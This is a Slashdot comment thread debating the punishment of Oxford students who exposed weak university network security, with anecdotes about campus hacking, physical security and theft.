Why all these intrusive and secure measures just for a college campus? Its not a military base or anything....
Light travels faster than sound. This is why some people appear bright until you hear them speak.........
This story reminds me of two final-year students in my old CompSci class (at London). They broke into the department's system and read the mail of the lecturers for months, distributing grades to their friends before they were released and generally messing around with the system while covering their tracks.
Just after their final exams, they got caught, and after a short investigation their degrees were annulled. I remember how odd it was at our graduation ceremony when we were all walking around with our families in our caps and gowns, and these two guys showed up alone wearing shorts and T-shirts, just to say goodbye to their friends.
So they wasted three years of study for a little hacking. I often wonder where they are now.
---- scrm
I see a lot of value in this. I latley saw a TV program that showed how easy it is to break into a normal (let say un-patched) house. I take is seriously now, as I previously felt secure.
Ok, what's your address? We'll slashdot your house.
2. show the pilot on the next flight I'm on how easy it is to get a gun through airport security
Applies to the logic on point 1. If you can show this to be true, we all will be much better off.
You're right. We would be even better of if everyone who flys tries to smuggle a gun aboard. The more people who test the security, the better the chances are of us helping them find all of their security flaws. Yeah, that would work really well...
Hold it there, cheap in no way means insecure.
Why bother.
Why? because we need it. (ok I work for a different univ. and not much for CCTV but we have swipe cards here and there).
The thing is Universities are great targets for small time criminals. Lots of people going in and out, many faces, unattended equipment. At least with swipe card access, you can be somewhat sure that people in the area are suposed to be there. It helps.
It doesn't stop door jacking of course, which was one of my favorite techniques at a previous job (wouldn't give me card access to some areas before 9 am, even though I started at 8 and often had jobs to do in there, so I would just door jack my way in, and get my work done)
Youd be amazed at the things that can go on on a campus. Some amount of security is important, theres basically 3 types of areas they need to secure. 1) places where people live (dorms... Frats are generally completly open and the U doesn't give a fuck), 2) places with lots of expensive computer equipment 3) Dangerous labs.
Just ask some student friends of mine who rented a house off campus last year. They threw some great parties, and had 11 people living in the house. There was so much in and out foot traffic that they had problems with people walking in off the street and stealing things.
Its easy for places with alot of people traffic to get a high profile and become a target.
-Steve
"I opened my eyes, and everything went dark again"
I must agree (even tough I think your are sarcastic), that is exactly the OpenSource method applied to the real world. Why do you think do companies pay people to test their services (for example by trying to return a defect item)? There is a big incentive to test the systems out there and the real change in our way of doing things would be to challenge how it is done.
In the context of this story I must add that it is the journalists job to check if the system is working.
The first college I went to had this poorly secured novell network running on an old Vax cluster.
They had it set up so that, to use a computer, you logged in as the computer, instead of as a user. I found out that, if you logged a pc into the network, using a username meant for a Mac, and if that Mac were not already logged in, it would completely screw up your priviledges, and let you do many things normally reserved for "Administrator".
Friend of mine wrote a batch script to send out an amusing system message once an hour. Unfortunately he didn't count zero correctly, and so the first one was an hour, but the second through 1000000th were somewhat quicker.
The first I knew of it was when I walked into a computer lab and heard this symphony of "beepbeepbeepbeepbeep" and saw a couple lab techs ripping the cables and stuff off of this poor little Mac while screaming, "ITS UNPLUGGED! WHY IS IT STILL SENDING MESSAGES?!?!"
ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
I went to LSU....and while there is crime there as much as any other campus, we didn't need such draconian measures. Rooms with equipment were locked...labs were opened by the lab asst. when we had class there....we had locks on our dorm rooms...
Now grant it...an axe murderer could have come in and taken out a whole floor in our dorm and no one would have noticed for weeks...but, the girls dorms had a check-in counter you had to pass by to gain access. Hell, one guy I knew had a chick living with him in his dorm room for a semester...and it wasn't a co-ed dorm.
LSU is a pretty big campus....and with a large campus, you always have crime, but, no worse that a large city has....so, I still don't see the need for such 'high security' measures at a college campus. The enrollment there is usually about 31,000...... I'd guess this is a bit larger than Oxford, and there wasn't that much of a problem without all those measures. It is a school...not a prison.
Light travels faster than sound. This is why some people appear bright until you hear them speak.........
Even if they HAD "broken in". Free security audit! It sounds like what they were doing were things you can do without cracking much of anything. IM and email packets are flying around the network willy-nilly, unencripted. It's only a matter of time before someone takes the effort to look at them...how on earth do they get punished for THAT? Then again, I guess it's easier to just make a thing illegal than it is to actually protect yourself against it.
Dammit I thought the days of people pissing themselves over "hackers" were over.
They should have read Business 101 instead. Think of all the money they could have made by selling email addresses of all the hot girls on campus.
....a hacked computer. See, we're very materialistic people (shallow of course). We look at stealing and breaking in as a physical thing...where the *thief* takes something...and runs with it. I am sure someone that physically stole a computer is more likely to go to jail than someone who stole the content stored as 1s and 0s (if they are caught that is).
Until the danger of stealing information stored digitally is fully understood, we'll never come up with (or enforce) laws that will punish such act. I have no problem if someone stole my laptop...but I'd have a problem if they stole what's on the Hard Drive.
Just like a driver knows they should stop at the red light, or they shouldn't run people over just because they have a car and can do that, so should a computer user feel when they are presented with a chance to breaking into someone else's computer or trying to break into a computer.
Only when people drop the *..hacking is learning and discovering...blah blah...* line and accept the true intentions of hacking, will we be able to make real progress in stopping such an act.
I do not know of any hacking act in history that has really helped *...advance our knowledge of computers and security, or helped a company better it's system security....* or done any good for that matter, besides cost companies many millions of dollars, take them out of business, cost people jobs and endles furstrations for the VICTIM. Don't try to do something EVIL in the name of GOOD. Do Something GOOD instead....which is: Stay the hell away from my systems...
(strange...my cursor is moving on its own.....?)
The phaomnneil pweor of the hmuan mnid. Fcuknig amzanig eh!
Anyway, on to my point. Two years or so ago, someone came in during regular class hours and managed to steal every single LCD projector on one of the floors of Langstorf Hall and quite a few out of University Hall. These were $5k good projectors that were mounted to the ceiling.
Even though this was during class hours, no one claimed to have seen anything.
Gotta keep up traditions, eh...? I've heard that Sir Tim was thrown off the Oxford network once after hacking it...? Is this true?
Employee of Inrupt, Project Release Manager and Community Manager for Solid
Hey, here is three years worth of sppeding tickets, pay up or lose you license. Ok, good, thanks for the cash, btw, give me your licence. i would say he has a point IMHO
Slashdot, where armchair scientists get shouted down and armchair theologians get modded up.
I was in the same boat in my 3rd year of university. I brought my laptop to school, but unfortunately I had left my floppy drive at home and needed to transfer my project from the server to my laptop for the presentation in class. I was in shock to find that all I had to do was plug my laptop into one of the network jack and I could get an IP and roam the Winblows network freely without a proper account. I didn't bother snooping around because there's nothing interesting to look at. So I proceeded to download my project to the laptop. One of the technician cleaning up saw my laptop with the network cable attached to it. He stormed over as if someone just cut-off his head.
For my part in "attempting to hack the system" I had a visit with the Dean, and 2 weeks ban from the university system. I told the Dean that I thought the University would at least use MAC addresses filtering..he wasn't amuse at my logic because "there are too many computers to manage."
Of course my parents weren't thrill about it (the University failure to accept their flaws). My dad insisted on speaking to the Dean but I told him to just drop it and let me finish my degree in peace.
They're said to have historical experience in crucifying the messenger. At least that's what my brother Tomas says - and he's been very active in this business back in the 1470s.
I love C++
God help you if windows blue-screened. What did they do to you then, toss you out for the year?
-Todd
Put down the sig, and step away from the computer.
Its true. The only card key I have to go through is to get into the server room, which is, understandably, higher security.
The only other place I see them are the front doors to dorms, you need a card to enter the building, then once you are in, its keys.
It makes sense for dorm buildings. What do you do when you kick a student out or one leaves, or loses his keys? Sure maybe you rekey his room, but do you now have to rekey the building too? Issue new keys to everyone?
Now if he loses his ID, you take his old ID off the authorized list, issue him a new ID, and your done.
Are there more reasons? beats me, I don't work for campus police.
-Steve
"I opened my eyes, and everything went dark again"
The argument could be made that these students were the messenger and that the real fault was that the admins of said network did not apply enough security. You may disagree with this argument. Many here do. However, what the hell makes it offtopic, exactly? I'm not expecting a reply.
It is a miracle that curiosity survives formal education. - Einstein
He might have had a point if they'd actually known that he'd been plagiarising for that long at the time, and if it wasn't absolutely clear to anyone that plagiarism is wrong, and if the guy didn't deserve everything he got (i.e., nothing).
Qualifications get invalidated if you're discovered to have cheated, even after they've been awarded. This is in the interests of everyone except the cheat, for whom I have no sympathy. They got this one just in time.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
One thing that stood out to me in this article...the high security they have on campus. CCTV cameras everywhere? Having to swipe access cards to get in any building, etc...
Cambridge, Oxford and Durham aren't campus universities.
The colleges and departments are spread throughout the city.
Remember when people were going to switch to AMD processors after Intel's prosecution of Randal Schwartz?
That boycott didn't last too long and obviously the system hasn't changed.
You should be prosecuted for kicking somebody in the balls, not telling him his fly is down.
Ten years apart, we have two "fly's down" cases that are referred to the police.
My God, it's Full of Source!
OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
I'm always upset with disciplinary action towards white-hat hacking like this. They COULD have just shut up and use the access to their advantage while at the university. Instead, this was for the newspaper and they were essentially informing the network admins of problems.
However, I think it is also important for white-hat hackers to ask permission before attempting any of this stuff. Get in contact with your network officials, you'd be surprised how much they'll let you do.
Now grant it...
I think you mean "granted..."
'Your brain is God.' -- Dr. Timothy Leary
The decision to install the cameras and the locks was made after many thefts of equipment were commited, even in daylight and most of the times without damaging the locks or the doors, which rose suspicions about the integirty of the union workers and the security personal. Probably is a completely different situation (the fact that crime in México is more extended than in the UK may be determinant) but it may just be the case.
.I HAVEN'T OWNED A TELEVISION SINCE 1967 AND ONLY WATCH MOVIES ABOUT LEFT-HANDED ALEUT LESBIAN PIPEWELDERS! FUCK HOLLYWOO
We have the same things here at Berkeley. I haven't RTFA, but here we have cameras in the foyers, and access cards for after-hours.
Most buildings are open for the daytime, but you need to swipe in for late night coding sessions.
It makes sense... there's a whole lot of equipment and computers that random people might come in and mess up, and without security...well...
Or maybe that'd just allow the authorities to pull the article before the news got out, and avoid doing any work...
Ceterum censeo subscriptionem esse delendam.
that getting rusticated at Oxford is a bad thing.
WARNING: Smartphones have side effects--most of them undocumented.
Wouldn't that be the lack-of-principles office?
Confucius say, "Find worm in apple - bad. Find half a worm - worse."
These guys are fucktards. If they're lucky, they won't be labeled terrorists and shipped off to federal-pound-me-in-the-ass prison. The current political climate is not one where you can do a pen test without VP or CIO approval and not expect to get the book thrown at you. If you're going to be a whistelblower, the way to do it is via an anonymous letter to the IT dept, then work your way up if they don't fix the problem.
Yes, my only tool is a hammer. And you're starting to look like a nail.
Oh, and who the holy heck are you to say what is the right thing? What hurt did they do (other than to the feelings of some 'tards who are being paid for a job they aren't doing)?
Zero, why did they deal with the issue like a publicity-seeking journo wannabe - surely it would have made more sense to deal with it, i dunno, like it was an issue? Your laughably piss-poor English asideOne, you're not the boss of them.
Two, observe Micro$ofts approach to "being asked like reasonable adults" - it's on the register and I linked it elsewhere in the thread.
Three, they are publicity-seeking journo wannabes you insensitive clod!!!!!
Confucius say, "Find worm in apple - bad. Find half a worm - worse."
Plagerism is detected at once or not at all. this smells like BS to me. It is not like it was published in a journal for peer revue. If this guy did plagerize why did the prof take 3 years to figure it out?
Slashdot, where armchair scientists get shouted down and armchair theologians get modded up.
Not necessarily. They detected this time using an automatic checking system, which hadn't been in use previously, IIRC. That detected the cheating, and they then went back over his past work that had previously been accepted, and discovered problems in that as well.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
No the Uni should prosecute them to the fullest extent of the law. They knew exactly what they were doing and that it was wrong. If they wanted to experiment then either take a networking course or build a lan themselves.
As far as "fostering an open environment" goes, if they had, even accidentally, managed to screw up the NFS mount hat you had your thesis on (and lets say you aren't exactly technical, say an MBA-so forget backups) you'd be demanding a revival of crucifiction. No-one should be allowed to break the rules without repercussions that should (hopefully) make you think twice about doing it.
Yeah, and most colleges here are right next to streets with crazy drunk kids wandering around and trying to climb the buildings. Sometimes I think there isn't enough security. And the fact that I'm currently typing this on an Oxford University network certainly gives me pause for thought.
Unfortunately the only people more likely to steal than military people, is college students.
That, and campus security is often poor, at least where I went to University. Many $5000 projectors were swiped one night for instance. Computer labs would be ripe picking if entrants aren't tracked in some way.
Saskboy's blog is good. 9 out of 10 dentists agree.
Fail their A-levels.
This may not apply at military installations, though.
Confucius say, "Find worm in apple - bad. Find half a worm - worse."
shutting the fuck up, McGonigle. God, I can't wait for my next round of modpoints you dickless bitch.